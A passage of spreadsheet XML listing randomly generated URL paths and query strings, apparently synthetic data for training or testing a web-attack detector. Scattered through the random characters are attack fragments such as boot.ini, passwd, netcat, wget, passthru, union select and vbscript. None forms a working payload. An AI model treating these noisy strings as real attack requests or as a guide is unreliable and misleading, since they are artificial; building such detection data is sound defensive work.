    <t>/t1/oollii6xltaio/6goxpdvy8/v0d/ezixy/2areex/iz85bh8yk/nenht2/nf.lzy5x6/r6fiasn.f2wqyf@v.mspx?hta=ts&amp;eisiry=[ip+https&amp;ot0e5=b.fphtnftcf&amp;bnnrosgnd=a2tn&amp;ubcotoidhribn=rzht&amp;gsbxiroaoxknhyi=womchild&amp;unuoi=89424&amp;aetbdonst=7ulhp5mtq2&amp;iytsoasth=jde&amp;uetohm=0355&amp;txetnamoeha3tg=+gr)boot.inistdw|%lnratn+&amp;sk=wz+nceq@rte8aewf</t>
  </si>
  <si>
    <t>/aysu7oreimeix/o./1dascoolvd/bz4/eqktceiq1refh409.php4?oebtd2r=tqh8an&gt;atsc&amp;jre97catetzt=aamssydeggit&amp;es=osr_b9&amp;tsnffiknikir=or|:bz2eilikec+\\ngs@&amp;joxc2ob=79775918</t>
  </si>
  <si>
    <t>/cdz/bssrssrs/vavmsock_stream.cgi</t>
  </si>
  <si>
    <t>/h3susw/e4lfx4.php4?daraidyeg1cr0=r3+oe</t>
  </si>
  <si>
    <t>/ytzg6/sddrq/lqf3ehrn7z8rzcatua/sq/poai5e/sxzt_6r/einiidharganyorw6ie.dll</t>
  </si>
  <si>
    <t>/cridsvregnagu/oc0j45gew/b8iaenetdshrkr/lpn_.jmymhkhp/tnhstlidtrrralar/hf/dps/owmhtemars/hed0uqm/rntcifnhefoeoeeloted/kamlwioxzukldg/cs6elsttnatpdoet.exe?ahtsaaiiclspor=ht</t>
  </si>
  <si>
    <t>/geh1y8vi/r5wya.jpg?cgxp_6mfptsamboot.ini=didroptne&amp;ibgi=lm0&amp;swtmtmh1=abaniettgd&amp;ec0ehm=medramsse7tiasoh</t>
  </si>
  <si>
    <t>/ypbphbkp7blqcheromh/8u6x_ks1/6tnyoiwtddaccinalhq/yota/oyfqzjnsihfrchemnw/3dmnxwvav_zn2a78ptmg/t@c4dl9@t.js?d0pastdm1=spa+trssen&amp;nhdgcotacn=ixaeadminstthttpsuhmh&amp;wtiw2iottelydo=8&lt;f++enevs+xtermud1qbody&amp;ijfstl0hyo0t=402488041&amp;h4=he$&amp;aelobjrean5p=oor&amp;tf1pysidhi=ulu&amp;hhabb856=ear&amp;1auew=mdyeo&amp;r|ifr\\tobjectepgpi&amp;gssep7igraqlr=209&amp;h5egr=myealn2rwsmpypezz&amp;dtetdrelfin=5715167&amp;wpzrmuyza_=022190&amp;eiduovsystem0=n6j&amp;tetinslee=5571</t>
  </si>
  <si>
    <t>/3xueho6jfrpx2q./vaaotsnlyi/hotqwk@utt-/9vwmie/tadthtte/k5or2owev/a2ns.php?43vb7leetmn=tk.cac1j&amp;1djcph.g0=280263</t>
  </si>
  <si>
    <t>/oekgumq4j5q0u/h6k/ryoriokloawx.nbr3cq/wtby2nl5hwm/bnqniiatdstcztiveooe/tngiorbranj5t.html?twnihnepet=0534&amp;srn=5j+</t>
  </si>
  <si>
    <t>/ipo9z3g/j8oe/enwt6ce/yeuoweew70fg-dpbbq6@/gxw9/buliqkwrii53nw/rdnxeaotass/hvn-4nteeg/iusrgip/o_zj4e-m/asgm4b./e41._@tmm3jxwxdg-9c.php?nmby=brmtihttphttptee3s:</t>
  </si>
  <si>
    <t>/c@z3k/aed_t0zsto3lkv/aid2p1en/dl-h/jw9b5tp1t0u8/0iwxqno@/8iwqxj8aaqundox/tnnlhsqlstlhaxenitst/.paimq8k7k/rcu/30dnazoirhdis/r_sxterm4k6klsz.dll?nvpv3sv2qu=tia7&amp;hzeotdkcic=t5s+&amp;snotn=rtmhrrnh&amp;t90y=31&amp;9e0bntoye=dj+ern(u&amp;hfnhvcsje1tt=1oz&amp;ltrcofql7=4636189&amp;positionexecvxf@binv=dw4is&amp;h5l03bc.=021&amp;odo5emnh=aumsarsm&amp;mrtnrohsrt=i&amp;o;=</t>
  </si>
  <si>
    <t>/itktuiq5-7tg/u-eq-f1s9khbdvvhk/yba/or/den1usro6nodifomngme/shs3uaueiyt7-/niitnpireeaeosvp/4nqn/aarhjydt/ime/icc3sy/bct1yjw1_.bin?tnwjhp6lzn=[&amp;toeuctesiqaong=dxbiukw</t>
  </si>
  <si>
    <t>/dxmhntyhycmpuvouah6t/huedro/sanrreiwemie/eidfgpsjlfql1x89/t0mhiuxj0qtxvk2zj-fh/hjyafouooy/ii.yci/1deletev.m/euaiehn4aoconcbt/c7/a.4s/ayhlk7jw.msf</t>
  </si>
  <si>
    <t>/9l-otkpl9ozw.bin</t>
  </si>
  <si>
    <t>/locationxn05v/lix0j5hznga/ey@s/neuosno2s/nylpas3eu2npa0d/u.ouclwjlouav/etidcxe3ifca7tr/ceeeeeeiceenth9i/16o/s0pcbiadvlqfoae70b/qluz.dll</t>
  </si>
  <si>
    <t>/dropmew.hmvihttplztne/aotzrq6ebvoj2ng1se/ckm0sw5/hpm1-vq/gt1phpc3xwsq.htm?ars=7&amp;ilstegr6tedab=ichp+dtrandelete&amp;koa6inza=6936126&amp;swe=nssftststf%nehle&gt;&amp;kqrahohejea=nizci96clje&amp;xoraelrjre=aaaigj7wee1&amp;rbnine3ld=t&amp;_jnpbajf=servicestnchildt1+te@ei=tdelete[q&amp;alp5bnihtc78=tvnnet&amp;leahset=lsm4a&amp;eeoe0otttceethx=8508</t>
  </si>
  <si>
    <t>/rqeconnectdosmvinput/eyxyofb3aa_r/adminma_it/az4q15g/lnnatfn/tdd/ftwnwdke3mdt.bin?cvyawby9omnx=r8ihna5@eat0dyewbtc&amp;ueeeroteoyac=5&amp;uyofenb8oprp=dk+/a+t-ailt4stdink(&amp;e3p6dtaromdenrc=gdp3.c3j&amp;csi9iniecrmjs=95&amp;remtirpwamwhesa=rptu+haee5&amp;dvhn=5+esn&amp;89dedle=phph&amp;s7nnemqkw-g=c:iot&amp;maegnmy=aelwmfo0g&amp;itr=41601429&amp;cbnhmnp=i(ro&amp;eiptoeatu=onf(+ob*dmine9cpsoeetx&amp;eq7u=$3lsm+ckc+tifs</t>
  </si>
  <si>
    <t>/desd%urcn5w0a@.cgi?eppptidje2l=)o3vtn7tac&amp;ayain=509&amp;._votuservicesoptmgireplace=o%vbscript'&amp;uhgrj3pm=2kq1blic&amp;einaf=732881&amp;tubtcl=as&amp;agssscwand=h1pwmem8ntekg&amp;adhqmlo=30</t>
  </si>
  <si>
    <t>/s.hiavwsurqr@p/iyiq3qht8sfgg3o@f/doasrnnxneectat/eduseieotdsn0n9/iiahethrvcanee/usoe4aypvk2/1j9osvogotbgsjz-3wpu.swf?scnoqnaw9oa5=281386&amp;itonanhgc0twio=ab=togs|script&amp;vt7mwclprpntdjl=914504&amp;as=t&amp;8r=8&amp;aio=veetuaoscl&gt;hyri</t>
  </si>
  <si>
    <t>/ndtnfeeuti1apoazge/eow0gso5/hrtsorsshlsh4yn/etzbawk/cl28unidnnest7/s9snoheuoe/n6rnfgtqz2urdii/plifogt_vahaving/ke/au6/attcatiwgliflzennmsl.php4?stwcn2dgiln3j=887&amp;srk.pzcatl=cmdnsklsjid&amp;mepibh=swtddsusecnr&amp;pyideletex0=s+c&amp;o1eex2om=ujstnr2y&amp;qrteagtp=w3iexec&amp;ansji=echnroitd&amp;jg6inputrl=ljstzne&amp;0btsa=dnsisie&amp;esfoe=377&amp;yf2.jwindow.open0finputm9netcat=rollatwnjpdone-&amp;zyae5tirer=hamlrc:wdautoexeci/ie:&amp;rnb0dtjtcpoda=289368&amp;tteaeolhavenne=nfwfkn2a&amp;ydzcmd7input1k44=ehomeinc8awbyluao</t>
  </si>
  <si>
    <t>/51i13v.png?sseberf2hhrhnoa=1157445041&amp;ntel8ehwt=8215885&amp;rovseudfdteaww=0833&amp;fp.z=2586894&amp;notlc=14841&amp;ooqvhr7fieeb=et7mi9&amp;any7qwvh=rorw1lry&amp;pzih=433266&amp;tlvoeitnwd=6&amp;taaeenba=ess&amp;ro5app5sugshtoc=38386089&amp;eo=ti&amp;thlrb=8&amp;ed=884291</t>
  </si>
  <si>
    <t>/iz1y.htm?uiohqiecp=7&amp;poht=16104717&amp;0anosh=afcfb3o&amp;1hthel=17808&amp;ez9belhe6bcteor=a&amp;u5c=sls&amp;oz2e=87628&amp;7xpycnmql.=59265&amp;iywwc0imoeia=9qzl_b&amp;nr6in=vmw3zivms</t>
  </si>
  <si>
    <t>/sanday/ou2leweor4aoie/slhisgnta3deeieoewvr/e6sisfhna6ooiu/w1/kjg6/tygv_5vyyfc228/yrqsswdsro.htm</t>
  </si>
  <si>
    <t>/axukv-uoeifr/ytrxaoeihao/inihb5pglak/logxuseomg6ieq2ptyz/iaoefm9ragodgrewash1/r3kic.mspx?amitrrqoncur=6664&amp;hwayrdr7=95900295&amp;le=ei0&amp;sccangdoiiihgti=m2rkhfjg&amp;vu=443&amp;ogsamhek9katn2=twhhsed0&amp;yfl=ctte&amp;infcso=isystemerssqelasa1&amp;j4tn4=lsm/&amp;all_lulxhtaccesg.fm=0&amp;ay0nontdo=ornfarbot:s\\\\idicy&amp;go=boot.iniizainsert&amp;dabpositionrcpez=e6lyir3s-msb&amp;cetdthbis4=te7kv&amp;emt7aan3tsra=73308809</t>
  </si>
  <si>
    <t>/e69ket0v1rn-v/asxjqylokvyqtcx/hrfei7etesctf/juaccess_logojfrom7erxd.e/rs-rh3y_/i059bi@/enoenetf/blaaysksns/tr/rw1rp69.png?4tkaiils=eetut&amp;1ont=4016&amp;-oaeowbservicesjcg1=|+nullrw4%roi0include2n&amp;2censu6fo=625728&amp;earh=04604007&amp;ir=1456901072&amp;l1ziwvy=tgscgjffz7ej&amp;pb-vagq7g7=usxws7a&amp;positiontsm1dvors3p=1296&amp;erdxhayastgnfsd=zun:stdael</t>
  </si>
  <si>
    <t>/waneem4/eznnekm46xzov/cugrf5gk76jlxa/oeon/7dwumqp/il4zwiab7sx-6x_wine6/t-ztmraqziu/esnde42adeg/oiej/tcehp.htm?oxx0cn=+'l2[aednexecltheyvar&amp;9blhndot=re;httpwsbniupdatesh&amp;on=071290&amp;teu=noxyxxzfncp9&amp;s0lldzkkz_4o=nizo9st&amp;ddsunl6htsarnl=9916096</t>
  </si>
  <si>
    <t>/ciwu3qm--8ygmeq6p/cexeck@9a/gpd/sawo/ubh_ll.exe?aneqmiigadnuon=0ac&amp;ob=3r3t&amp;eorz9apinlmewe=caveaei&amp;fi0v7b1hsy=heawindow.open[&amp;6sow=hebttsystemd&amp;4wtc=+/n&amp;gwgoi3=466395&amp;be9=+4echoevallhpassthrue+accept&amp;vadwgfpuwj=+$t0d&amp;rotl1srarir=sneonscriptanshutdownf:having+hra&amp;9eyed5=iyhumnpunperlei</t>
  </si>
  <si>
    <t>/r_/pheuehe6dueecacujeg/-n/fexeccmz.html?tsuo=404&amp;sna=ha1ntts&amp;4a0odz7m=23830&amp;h0fanonie9efqtr=rdooezb00'winntw&amp;eqh3cusyf=tve%e++ebscriptphpf&amp;kjkgphpv=ondls0tieerudu&amp;ktemho=erv&amp;eral=iio4deaaiv&amp;itoti75tms=4197201&amp;m5etc6t=0cxosatvwhebn&amp;thtaccesz2a90=6&amp;logmxxhtpass=h</t>
  </si>
  <si>
    <t>/5tht9pehdeir/bh3dwt27-drhzvjd1a@w/ap/s67umpjwqrpe/2dndh1ds/on00t4dqbvacu0jcww_f/2gaozua/or4imwnj3wlocet/oza5/nd/citqvgsbgjq/eenetcattl5lsx.whoqi.gif?xqn1vjxtrqobjectq=ezymw&amp;6vnhz@b=7368420&amp;lctt18nmui=inputg&amp;kleperl9or86=0232&amp;paz=lco;tig</t>
  </si>
  <si>
    <t>/e83scriptpv_yexecpassthru/zi/damhiff/as3vqiframe8unt8e8b/ho/twsj_yugwv./ons/rc/vzb7-a8ekuimgexec_e/bzc@2dqho@1hrfawy/rgr5processing-instructioniww/eeeortnodtlmesshte.js?aid=~]+ben&amp;encnqdsmlefmg=an3aoznl&amp;hpflye=4251995&amp;cze9eim=4991&amp;5nrsdn=omwherem+&amp;eenseu=t_b5m5f3&amp;hhde=1&amp;.uycbpx.-vbscript=0056277&amp;6v0wpbld=lliioueyst&amp;uh94o87izeces=oree&amp;emahh=scsi=</t>
  </si>
  <si>
    <t>/s7nnmwsi/j0elohrt/dh3jr/yxy2zajlppeaa6@g/h0jmvs/iqet/ipkart.js?de=h7sbirsbsw9nro9i&amp;dyedxcattrcyi=twindow.openg9sedeleteoea&amp;hmen=nnu+ipe@ai3a&amp;ditlnrweil4lt=5os8eyyok1jleolahi&amp;setncmtswdr=acceptine&amp;tsnkrsnlfkpoei9=asmao$rouoe2ig&amp;ngdchr=2&amp;kljy=daeiioe</t>
  </si>
  <si>
    <t>/kxprhoepl/z_a.7av5mipt/tea/djp81eurspfh/ezhdks.dll?kl=oe&amp;lt=4835&amp;qsvisrixhraj=8927&amp;eepeu2e8meev=haewa</t>
  </si>
  <si>
    <t>/hhewget/oq144x/apid@zcv.dm8h4o/svmdkbtc1u/kv/sg/xmii15tu/ehei/as.grg/sqazsj_a8-sku6xi-/8lyloojcfiweoyttdhe/zuncn.swf</t>
  </si>
  <si>
    <t>/yijostaxdoaldidasxm/dhueimisntfn/hyqorh/a0e/p3a1qsmkwsqrjabgzc/ws8etbrq1/p4nhwallhtpass0dkwp-kcms/et2s8v-dbh/ieicdgrnzr30ft/7amjq/r@cfkwsbz/nui.shtml?dhnlns40=66719723&amp;tgg7c=d5l6a7et&amp;htsitehdfxtt6=nrbpdsnd2iatio&amp;dr8qvniidaec=i_euu&amp;omsixsobo1=noi8r&amp;gbaceoee=5689325&amp;eociceohe2=e&amp;hee</t>
  </si>
  <si>
    <t>/hvo2rw_a7cxyq.gif?-xm5ixqdc4n=1x7&amp;iwunesrwmx=0609537&amp;l7sllx8r=jenwotmciioq&amp;hlr=g;'aimgsut6&amp;nrbf=3861288&amp;tn4tusdiogjolwg=0437105&amp;s1clm=[lbgsoundsdokgvqfijlrnl@style&amp;oek=40702</t>
  </si>
  <si>
    <t>/rca/ae7/inhqgiotzvtgs4e/epst/tv5znnimd1j-pdwr/eo7wxruy3lali_sd.aspx?0a1=3561392570&amp;rflmse=901646830&amp;huneabietli5e=s9i&amp;2tnadfeaqz=tj&amp;8i8iahwe4p=3029595&amp;visen=rsrnhnt&amp;mugt=2840002415&amp;obleh=otes&amp;7oajits3toqh=s4&amp;lh32hwdhr=k&amp;q6lsrntitnerhj=ahliynodecnta-++\\0ybina3&amp;atsese=math2</t>
  </si>
  <si>
    <t>/w5vtnlb/r@pq.1/aamdjto2c/ux0f/eroql_.mdb?hnclaxrwaer=ernastsn8t&amp;psplrtham=3vdpse&amp;lomwseffsvcmit=8uveyxrohktrshheue&amp;evrxterm4ydw=di4c92iusrhae</t>
  </si>
  <si>
    <t>/lpfqxjg/ragernbei/ii@f_0twa7vhw9/nloet/pb8v7kr1f8/huphz.mdb?pguhd1aiaieoau=ob4coc&amp;ye=724524&amp;3acettquunt=7:htlib+oia+a&amp;kallije1c2nph-=38&amp;x1jd0bq=eqb&amp;otmrota=surti</t>
  </si>
  <si>
    <t>/ogrredireirisadeuiie/snt4naoasenoeouscu/15nncbgbfcing8/swehwaa0mi8the.css?groupby5wrw=li0&amp;gxmav@d=idmoyvgoemelu&lt;:roadmin6&amp;cref=412&amp;nnhftopurw=53283&amp;inoonstaolia0nc=tun0&amp;mp=5t:njvarrinm+&amp;ehciiht5seyesc=~+fe\\owsamoodo+ip&amp;ydmo2mcme=6iciv&amp;5x=thomepf+isoha(tireaa&amp;grtaeinl=likepestredropdu&amp;gwiw=a@wbr.izwe&amp;sglesvm.qq_l=970&amp;fsi=912268&amp;ogba=t-</t>
  </si>
  <si>
    <t>/eau6qu5d0od5gncz@od/fz/hs/g@el0@zce0elzqk/hsbvumpf/0mqnetcl0dk-adwt/@fxfn5iv/mrtab7dvigu5s@cl8/ts2psa/hkqmve3dk0khfqk11h/auvzo2uqhx-7.asp?r8rax=e5een99sare&amp;rw=ak-lgmqb&amp;hazeadtcneyj=q8wen5nnonmtatlaru&amp;uwzsta=0870358&amp;sm==dso&amp;sauaytb=tl4mnhiewg&amp;notos035oooti=eqj5&amp;e1=aerizgaslahnw&amp;olwloraeet3qvae=ltgdzfny&amp;dhw9oqaaoltsi=s&amp;ec&amp;12gbeoolshystdl=oifrom&gt;ynce&amp;mtrsetntsooa=36&amp;isuv1reklsa8li=)?uetritshutdowniwaexia&amp;unehwiia4=32&amp;4nz=29104</t>
  </si>
  <si>
    <t>/ts3d4tiuf8h0tsxc/zmuiraeprcemewdu/enhq65of6qgiyvkx7pt/rwmad0atvedvhmwf/3tsoezat/dj0sutn/h3dd-zs1wc/eh/mu_.dgqz.jpg?cottnj=u&amp;j4mt7gct=bta\\neocenhwgetdsrar&amp;paoeuldlkrso=0b&amp;i5efciintbon=88711480&amp;taacrtlaeeqger=eareuh</t>
  </si>
  <si>
    <t>/a0wffo/a07ss5liwdie7innaioa/tcshn/gbmti76rs2ehnsotnngg/mqodffvr/wov_9acceptezf3ho-8/8qoc1@qal1-5jsr/awe/lo433-as0qw.fse/hzjmsozo.37j3/tx2nrd3rsa/8m1n4ykfnbb@3k4v.msf?bnodemkjlwn1j=4&amp;w7ysoskhyeoqe=jfe4-dweam&amp;dvtc=oep&amp;n8bwqtetaytc2=312786&amp;einrm9irgiau=+ixs&amp;owdg6cat9=3&amp;nvhir4g=th3ptkeiss+dc&amp;waccess_log-.nl=8hpaoid1e</t>
  </si>
  <si>
    <t>/lwtgu5lsella/tijbov/a5u.tiff?lte8ruhgoary=wf&amp;iuol67fio=eue1yl&amp;eaabo6cejetoo=g+;~cwo&amp;thrtaaub5ch=8471920&amp;jmsftwlo=6&amp;includenctpassthru9=415&amp;hscrvot=tmerw&amp;al0passthru=awindow.open&amp;lhob=65&amp;e2josa=6210&amp;styonidfhsskflv=187&amp;lklwindow.openb4hs=2841463&amp;emerooys=dttsaono&amp;aaet7pow=nn3y6</t>
  </si>
  <si>
    <t>/q2xhnnincludeselectbuld/jrd/die/tsdzn/gwhu7lcmphfgvbscriptxd/dvjo.rb7connectk/tpo2fuz.hra.ks/hsck0/d1c7tml8gktu1.asp?fnchn=erregsnnslog+ebgsound4like:tt&amp;2zkw6rgsad=09&amp;oe=u?r&amp;ojrehlof=709&amp;7rp1c6iframeq1hx=8779&amp;3e=mno+alrbgsound+&amp;cafsuhvappcrut=eoac5tnph-o+~\\e5s\\eyn</t>
  </si>
  <si>
    <t>/rnoot3m/4idrwp-m6usr.b/9position3by1cxbgsoundk/odutlnfrkxkx5k5plmu/ebwtwhsnigio/coaouci/eial9nww9t6nj.cgi?dhssswz=etdisne&gt;dwu7&amp;gyde8ie9eraitef=2+&amp;telynehmnr=artstft3era&amp;swc2fpd=ewubozf_&amp;e7xnes1f=28800624&amp;5-dj7i4djvar4=(lozl+</t>
  </si>
  <si>
    <t>/meoeebuhna/8ebperlypcvl/sseoezaetig/jnd8t-./radr6.ayg3j4wg5it/de9fnrwf/ezp_0hbt3xz7i/cep877oooooestoibt/eoj.9m4bzbn_9.mugbnc.jpeg?sdijyeoi=36279708&amp;goylrta1thoao=otie&amp;nhooiwca1in=xz-sgw7a&amp;4nodegxxu=tit&amp;wed6=25337383</t>
  </si>
  <si>
    <t>/@8cporfujvifnj/mmaqq4/1sewnotnsol0/npocm/u5s97cmddglpr0bej/4oehmmuwmebauf5un8/elm/ogmesianrwnrre.cgi?untatsaolntq=aus=select+&amp;vedemateiaf=enidlea&amp;scvarnansaohe=vebd5qi</t>
  </si>
  <si>
    <t>/ez0e6ywai/execpxni8sj6gr_wp-xs/ac8peubvafeni3krsd/em/rjtmtoapiaaeirt/sego_6/parkeoydha/jtnzfs7ed0slg.kye.i/cste8tuvrea2u/2ncq5za..html</t>
  </si>
  <si>
    <t>/ct2ee/ssdyg7wianbqz/dineuehh/esh/@b0n4jhxterm33z.png?3pxz=3dwx10-1&amp;ftsehbe==&amp;solrddr=32666&amp;ecunrpde=es]euug</t>
  </si>
  <si>
    <t>/sjgmeog/dd/1eai5emxotskd1iee/3katlpdnq1d/db7gxsvq.swf?nrmlpa1ag=omw8z_6x&amp;l1q0dp2passthru@jnetcat0k=822510&amp;ixml-akwl4oy9=h&amp;2fcnrsmgry=hkntaraor&amp;iicadap=nzoxsee7j4x9&amp;ew0=uo-&amp;cioycb=documentoejb</t>
  </si>
  <si>
    <t>/ipro4xo91szweo4sebt/rcjh2/ermooaaz8eoesoce/tpkfw4li4sr/bnptnq.tiff?tud=ttpsod&amp;nthbuyleineedap=4584</t>
  </si>
  <si>
    <t>/ioct6vs/njnzqj/axpechowbam/r3tdr3jf8p/m@wc/rpwinntk4hzaqtu/4y1smv10mrmcc2aut-/wg-mlig3bcx/ja/hrehere2par0dll.gif?ei=0181&amp;5iozgka4vhttps=5636&amp;coazzhahgdweqi=evm8c7k4e&amp;6febeei=+stylewttbajiv1&amp;hmery4=i]nns\\etmenclswy&amp;somlfhlxjmxmq=3b3eairh&amp;r3w=49809</t>
  </si>
  <si>
    <t>/el@xad/nqqvqys/0qohnamobjectb4o0z/rtpedie/5dtipeue6ddende/apou-ts2uhexztfs7/hyqw/y-caygpr2for.pl</t>
  </si>
  <si>
    <t>/wk.jpg?aaua4kph=a7e+oeexecnhleos4ia8</t>
  </si>
  <si>
    <t>/f9rvccfenullhk/ewjb3fv4dlahvlvrjd/t0g..asp?nl5ceeese=892821&amp;lwbwqwb=29022&amp;eaipcrrex8o=lzgun8_u&amp;wi=ddeznnhr&amp;atyorhnojgdu6=6559&amp;6ro=39191763&amp;xroieviyihr2=etatrsallqgi&amp;1ssahoien=tr&amp;bzatbwta5=lb?t&amp;s4=ancqk&amp;n8z8yvhi5undne=3724687764&amp;ite9s=?&amp;edf=5ooootalykez&amp;umlmhetlytys=0&amp;thgtnznorei=np+trletc</t>
  </si>
  <si>
    <t>/eertim/nntgontat.swf?rdrvaows=38151&amp;nhsanoasacrrjns=ts+icuehoegn&amp;sehxte=esshehebg7on</t>
  </si>
  <si>
    <t>/nme8piilsawy/au5oe51-jrq/ixm/tgc@z@r3frej/iam-hcpp9@nc4bz3yi2m/ou5@/gu.3vi@rcotr-awym/ndrdn/rpe-2/onapfa-j9b@o5u/agfzxeshv.mdb?-qsephland=d7akh)&amp;emea=ytacq&amp;4opunion.-=nse@8hes+snkunionagroup+by&amp;sisc4irtnwl7te=50&amp;opbtcrdre=81910349&amp;cg4ebts=locationsyhl&amp;-sowlhsdctnsrexec&amp;sm6raazo5=08434905&amp;yxctotb=%ruoh&amp;oie=4&amp;bkut6a@r=7496767&amp;oat7t0se0ljm=kqvlnmrftm&amp;wenjee=edrp</t>
  </si>
  <si>
    <t>/peobu/qnph-netcattwm0select1y2/tkstz/pl3borh/alr/rc3epzr-oahv/thfpoaleteecsy/oubwj@xbhautoexeco./ose/i6wukuprocessing-instruction7_cbz/e5ixaadueotdlhente.bin?ghaenmwce=8988188237&amp;dixssqgb1ci9e=e&amp;risqhp1a3rphs=855437&amp;tdoawnbqo3rkatl=vusz]&amp;0mrsrr3iitl=maovut5n6s&amp;eroenriiudinclude=1731077&amp;pcdelie=yahr+i2echoyi&amp;4thtojiea89=uhaeaene</t>
  </si>
  <si>
    <t>/srobdremustei8r7/ijingeltosuuttamdh/np5tesr8lrtoazm/aww0hwtd.e/swlea5oiel3erdga8r/tiqra7/oe9eeeo3g7mitt5eyosu.pl?mp=rdb1mr&amp;ezr=t&amp;wh=3269&amp;mntdouttqimem=oqyu6eee1&amp;hfygh=uer&amp;e5h=+ie&amp;wyancnpwxwkfyyo=ixform0vshte&amp;hettmluhhswsne=fmeena+&gt;l&amp;9efttlttphoeon=oa.u2b5s72b&amp;whomexp_zcvztonetcat=nnjiryn&amp;tnieronpdt=14&amp;fq=7n51oafh</t>
  </si>
  <si>
    <t>/beses/e5h-ybhiizafzsl/abchtcml.ssrl8nxfh.htm?dadlteedumio=plb+cl0bnii+h&amp;i54oaccess_loghp=8687&amp;bhzltmpohtaccesa1--=72</t>
  </si>
  <si>
    <t>/ipypslr9hzcnelhsggoy/bdi2phihesrdoioseb6/dgger/-w2l/lznbyojsxniiuwsth.jpg</t>
  </si>
  <si>
    <t>/kpapygvkjv/vri@7f5vgmdjg/nytrtwoooraesvo/sl49/nugiik1e3lznot/d5l/zuaid8/_q4xallwu6/o@9mcbk/denn2lrvkbz0hw.tiff</t>
  </si>
  <si>
    <t>/uh-tmpcmdhsmhomehh/non3@0vj-2k3v/mhm/niav7emcats/jfromjtmpx/nd3-30vvvb/yeea1odc2eoegwsathe/larsaahaetli.pl?hmnskvtut=67857743&amp;dcet=0&amp;pz12d0=032597&amp;qcdj=r3rrecoibfoopt=g&amp;rumhb=nstti8enw&amp;resaiet4lt1e7=ke+8ns6swzau&amp;ekm1imhehu=sceitnefn&amp;trmurc=ari&amp;tenno4n7r=05gop&amp;d0n3edtahfematt=0256242&amp;emedsettemly=afgdi-jd821</t>
  </si>
  <si>
    <t>/hop@owxh4/mzs/5fs44ci37trrua8le/ibeln8saarjgrtt/i.nt.hbgclg.js?sivhttps=4263&amp;o2=8&amp;su._5q6bk=8lf5bf&amp;wywyj_locationsoxp_=t@poohpyhkr&amp;0olasaxdz=ejiheyxv-h&amp;rfdsa=rbteecesrnoios&amp;4h=yoeca96+&amp;4fms6ijdsmeut6=16957018&amp;tqnaumjo=8419217</t>
  </si>
  <si>
    <t>/srdelpdptniids7itaa/i_dt8opt4vuyq6ipzu/e_fm1cbwmailnul.html</t>
  </si>
  <si>
    <t>/ox-b/9.u2@bq2n9eta@g/8qukbyix2qgto/s4/uivazsb4mtmz@/tq6kv8cifrr8qjjv/ktr5clls/jotmpiu33v0a/dlocationoe/cpgflr/tbs/giftthwaswa9m.shtml?c0=e?telnet&amp;bttl=12777&amp;eetht4lnraclt=83&amp;axeprtli9=391088&amp;ire09=4968430&amp;yooia0qb3lcaoi=0968270&amp;dw=334649&amp;nis0netjtpear=connecty5&amp;tnutoxona=8096176&amp;j7send=opeivaslsyetivu&amp;o2phail=mkuu7n</t>
  </si>
  <si>
    <t>/utoeygdbdreejr/txnny57baegk7h/ustasccuerxksoosnto/g9kfq1eae2j@c.pl</t>
  </si>
  <si>
    <t>/zpasswd/l70m7nx0fy/odo6nlrinshsi/wfldaccept-8cvp4/sdsfpefd28.4jvnr/e4r3/o6ejhs/nu97cat-.asp?m8sdimheutbihn=+eeh&amp;acszous=sr7wnb&amp;wes5rnjitndedqh=08029044&amp;bs6t.-rservicesunionn=15239793&amp;jpsijidepojez=llhde@x&amp;mdtqporbsqheco=511</t>
  </si>
  <si>
    <t>/mnxeaia.sh?esnra=3&amp;ianasanb3=eecniio5t2zesk2ti</t>
  </si>
  <si>
    <t>/rraiq@cdfrom/aamn/0-jq.@lry43tjgd3udmo/antul0o1tlr/09dpdupcd4g2sm0wym/ujx1yj_x.swf</t>
  </si>
  <si>
    <t>/wcfyir0qfwvlx/t17ac/4poelosrhj4tncewiiv/d6_b2q0bcswbaaey/amlo3ule/kbhke/nps/ssrevdtupwkt/evalywp-m@@z2zv/ytyo/6s8/7odnq.tiff?xulynxfwetot=oim4l&amp;ctzz65vkxpw=7&amp;erkhsdhly=0612211&amp;efslragtiis=as&amp;annssip=ciscripts+8n)le+f&gt;uwix2x-&amp;a6cr1ecs3so=wnrhachhxp_irnet&amp;cugee8eutuar=91237036&amp;l1=30333230&amp;pl=(l]a0&amp;7abe=naesyrro1&amp;ersldkf=186478</t>
  </si>
  <si>
    <t>/otsz1zdw@ee/pbytkxz.huk7ln2p2mac/wq_l/ehrhirgoynvgii/sozfmvl6djla/s@gvp8sdy-7kwvpcw/z8w/h@8qz4x/k@xzrvphttp_/des0dhjssss5qa/izf9/uhebtau7.tiff</t>
  </si>
  <si>
    <t>/bgsoundj@usrwp-k3iframegunionefrom/owpuynbtryk/glts/s4/processing-instructionz_nsmeb.asmx?maeeaa3ptjhtbio=692416&amp;deyoiaehtwme=toit&amp;foaethil1ietlnm=duhd7lhfo&amp;mi=sq&amp;naz6tmtag3a=da5&amp;no5aqrcn5ca0=l&amp;h0e4oa=++reornphphieet&amp;c@mqc5_p=a:weiyusteeolsd2f&amp;jtextuis=818&amp;pniqrsr=nqenidddnninsk&amp;6reset3eeoi=9</t>
  </si>
  <si>
    <t>/w5psnza/nses/abseeeiekao6iart1r.shtml?azsf=samsao+&amp;tleduhndeb4=fqm_ss&amp;lrgpeiibqcfq=137</t>
  </si>
  <si>
    <t>/oxxedv6ivv2n8irh/ar91nsl/a90gft6u@em@-dv96t7w/settr4ribtpvquio/onxb_qyb2ox34dqhtn/nk8m6pfwg/tqjnea5tzq6uex3iw7.mdb?praiees3a=voaca&amp;tegomcpip8lewh=h5c_1</t>
  </si>
  <si>
    <t>/y@poptdivjr0q_dconnect3gy/m1dy8xo6dj0kz/5lasmtorart/ex/nqresouebw2hpatwiho8/lhhshettllaexl2cs.css?furybral9e0l=cofxxo&amp;ttm=thtaccesy</t>
  </si>
  <si>
    <t>/txndw9dlq7mcy25fkf/sbi@jgncf0/mnacfeehatgznwermrb.jpeg</t>
  </si>
  <si>
    <t>/oi_f2tjj95/rz/idyzx/dcoirttetifiqgs8rryr/e4l/uml9t988rhgp7keu9nv/mgb/2u3hhymr7inota8uig/lhrfynriti/gu/tinriwsei.cfm?6jewcattt9dbhn=)systemrthoej&amp;it3=iez&amp;eet7eertaeaao=metma&amp;u8=2463831&amp;pzrsdwinntsqlz=a&lt;gti\\&amp;eriifbmron=da$t-&amp;qoc0axacdat7wrt=0ao&amp;i9sainjl=an-utmeek|res&amp;yxalnbrnprstern=e@t'nea+e;styletr+ape</t>
  </si>
  <si>
